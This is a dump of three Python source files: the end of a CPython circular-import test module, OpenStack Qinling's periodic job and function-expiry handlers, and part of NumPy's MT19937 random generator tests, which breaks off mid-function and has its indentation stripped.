"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
def test_circular_from_import(self):
with self.assertRaises(ImportError) as cm:
import test.test_import.data.circular_imports.from_cycle1
self.assertIn(
"cannot import name 'b' from partially initialized module "
"'test.test_import.data.circular_imports.from_cycle1' "
"(most likely due to a circular import)",
str(cm.exception),
)
def test_unwritable_module(self):
self.addCleanup(unload, "test.test_import.data.unwritable")
self.addCleanup(unload, "test.test_import.data.unwritable.x")
import test.test_import.data.unwritable as unwritable
with self.assertWarns(ImportWarning):
from test.test_import.data.unwritable import x
self.assertNotEqual(type(unwritable), ModuleType)
self.assertEqual(type(x), ModuleType)
with self.assertRaises(AttributeError):
unwritable.x = 42
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
periodics.py
|
# Copyright 2017 Catalyst IT Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from datetime import timedelta
import threading
from futurist import periodics
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import timeutils
from qinling import context
from qinling.db import api as db_api
from qinling.db.sqlalchemy import models
from qinling import rpc
from qinling import status
from qinling.utils import constants
from qinling.utils import etcd_util
from qinling.utils import executions
from qinling.utils import jobs
from qinling.utils.openstack import keystone as keystone_utils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
_periodic_tasks = {}
@periodics.periodic(300)
def handle_function_service_expiration(ctx, engine):
"""Clean up resources related to expired functions.
If it's image function, we will rely on the orchestrator itself to do the
image clean up, e.g. image collection feature in kubernetes.
"""
context.set_ctx(ctx)
delta = timedelta(seconds=CONF.engine.function_service_expiration)
expiry_time = datetime.utcnow() - delta
results = db_api.get_functions(
sort_keys=['updated_at'],
insecure=True,
updated_at={'lte': expiry_time}
)
for func_db in results:
if not etcd_util.get_service_url(func_db.id, 0):
continue
LOG.info(
'Deleting service mapping and workers for function '
'%s(version 0)',
func_db.id
)
# Delete resources related to the function
engine.delete_function(ctx, func_db.id, 0)
# Delete etcd keys
etcd_util.delete_function(func_db.id, 0)
versions = db_api.get_function_versions(
sort_keys=['updated_at'],
insecure=True,
updated_at={'lte': expiry_time},
)
for v in versions:
if not etcd_util.get_service_url(v.function_id, v.version_number):
continue
LOG.info(
'Deleting service mapping and workers for function '
'%s(version %s)',
v.function_id, v.version_number
)
# Delete resources related to the function
engine.delete_function(ctx, v.function_id, v.version_number)
# Delete etcd keys
etcd_util.delete_function(v.function_id, v.version_number)
@periodics.periodic(3)
def handle_job(engine_client):
"""Execute job task with no db transactions."""
jobs_db = db_api.get_next_jobs(timeutils.utcnow() + timedelta(seconds=3))
for job in jobs_db:
job_id = job.id
func_alias = job.function_alias
if func_alias:
alias = db_api.get_function_alias(func_alias, insecure=True)
func_id = alias.function_id
func_version = alias.function_version
else:
func_id = job.function_id
func_version = job.function_version
LOG.debug("Processing job: %s, function: %s(version %s)", job_id,
func_id, func_version)
func_db = db_api.get_function(func_id, insecure=True)
trust_id = func_db.trust_id
try:
# Setup context before schedule job.
ctx = keystone_utils.create_trust_context(
trust_id, job.project_id
)
context.set_ctx(ctx)
if (job.count is not None and job.count > 0):
job.count -= 1
# Job delete/update is done using UPDATE ... FROM ... WHERE
# non-locking clause.
if job.count == 0:
modified = db_api.conditional_update(
models.Job,
{
'status': status.DONE,
'count': 0
},
{
'id': job_id,
'status': status.RUNNING
},
insecure=True,
)
else:
next_time = jobs.get_next_execution_time(
job.pattern,
job.next_execution_time
)
modified = db_api.conditional_update(
models.Job,
{
'next_execution_time': next_time,
'count': job.count
},
{
'id': job_id,
'next_execution_time': job.next_execution_time
},
insecure=True,
)
if not modified:
LOG.warning(
'Job %s has been already handled by another periodic '
'task.', job_id
)
continue
LOG.debug(
"Starting to execute function %s(version %s) by job %s",
func_id, func_version, job_id
)
params = {
'function_id': func_id,
'function_version': func_version,
'input': job.function_input,
'sync': False,
'description': constants.EXECUTION_BY_JOB % job_id
}
executions.create_execution(engine_client, params)
except Exception:
LOG.exception("Failed to process job %s", job_id)
finally:
context.set_ctx(None)
def start_function_mapping_handler(engine):
"""Start function mapping handler thread.
Function mapping handler is supposed to be running with engine service.
"""
worker = periodics.PeriodicWorker([])
worker.add(
handle_function_service_expiration,
ctx=context.Context(),
engine=engine
)
_periodic_tasks[constants.PERIODIC_FUNC_MAPPING_HANDLER] = worker
thread = threading.Thread(target=worker.start)
thread.setDaemon(True)
thread.start()
LOG.info('Function mapping handler started.')
def start_job_handler():
"""Start job handler thread.
Job handler is supposed to be running with api service.
"""
worker = periodics.PeriodicWorker([])
engine_client = rpc.get_engine_client()
worker.add(
handle_job,
engine_client=engine_client
)
_periodic_tasks[constants.PERIODIC_JOB_HANDLER] = worker
thread = threading.Thread(target=worker.start)
thread.setDaemon(True)
thread.start()
LOG.info('Job handler started.')
def stop(task=None):
if not task:
for name, worker in _periodic_tasks.items():
LOG.info('Stopping periodic task: %s', name)
worker.stop()
del _periodic_tasks[name]
else:
worker = _periodic_tasks.get(task)
if worker:
LOG.info('Stopping periodic task: %s', task)
worker.stop()
del _periodic_tasks[task]
|
test_generator_mt19937.py
|
import sys
import pytest
import numpy as np
from numpy.testing import (
assert_, assert_raises, assert_equal,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
return request.param
class TestSeed(object):
def test_scalar(self):
s = Generator(MT19937(0))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937(4294967295))
assert_equal(s.integers(1000), 324)
def test_array(self):
s = Generator(MT19937(range(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937(np.arange(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937([0]))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937([4294967295]))
assert_equal(s.integers(1000), 324)
def test_seedsequence(self):
s = MT19937(SeedSequence(0))
assert_equal(s.random_raw(1), 2058676884)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5)
assert_raises(ValueError, MT19937, -1)
def test_invalid_array(self):
# seed must be an unsigned integer
assert_raises(TypeError, MT19937, [-0.5])
assert_raises(ValueError, MT19937, [-1])
assert_raises(ValueError, MT19937, [1, -2, 4294967296])
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random = Generator(MT19937(1432985819))
non_contig = random.multinomial(100, pvals=pvals)
random = Generator(MT19937(1432985819))
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (self.state['bit_generator'],
self.state['state']['key'],
self.state['state']['pos'])
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
class TestIntegers(object):
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, [0],
endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
'int16': '39624ead49ad67e37545744024d2648b',
'int32': '5c4810373f979336c6c0c999996e47a1',
'int64': 'ab126c15edff26f55c50d2b7e37391ac',
'int8': 'd1746364b48a020dab9ef0568e6c0cd2',
'uint16': '39624ead49ad67e37545744024d2648b',
'uint32': '5c4810373f979336c6c0c999996e47a1',
'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
'uint8': 'd1746364b48a020dab9ef0568e6c0cd2'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (np.bool, bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (
np.bool, bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
low_o = np.array([[low]*10], dtype=np.object)
high_o = np.array([high] * 10, dtype=np.object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int, np.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_integers(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[-80, -56], [41, 37], [-83, -16]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random = Generator(MT19937(self.seed))
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_closed(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
assert_array_equal(actual, desired)
def test_integers_max_int(self):
# Tests whether integers with closed=True can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
endpoint=True)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.096999199829214, 0.707517457682192],
[0.084364834598269, 0.767731206553125],
[0.665069021359413, 0.715487190596693]])
assert_array_almost_equal(actual, desired, decimal=15)
random = Generator(MT19937(self.seed))
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.0969992 , 0.70751746],
[0.08436483, 0.76773121],
[0.66506902, 0.71548719]])
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random = Generator(MT19937(self.seed))
actual = random.random(dtype=np.float32)
desired = 0.0969992
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype='int32')
def test_choice_uniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4)
desired = np.array([0, 0, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([0, 1, 0, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False)
desired = np.array([2, 0, 3], dtype=np.int64)
assert_array_equal(actual, desired)
actual = random.choice(4, 4, replace=False, shuffle=False)
desired = np.arange(4, dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([0, 2, 3], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random = Generator(MT19937(self.seed))
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['a', 'a', 'c', 'c'])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[0, 1], [0, 1], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[0], [2], [4], [6]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random = Generator(MT19937(self.seed))
non_contig = random.choice(5, 3, p=p[::2])
random = Generator(MT19937(self.seed))
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
import hashlib
choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
random = Generator(MT19937(self.seed))
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != 'little':
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert_(choice_hash == res)
def test_bytes(self):
random = Generator(MT19937(self.seed))
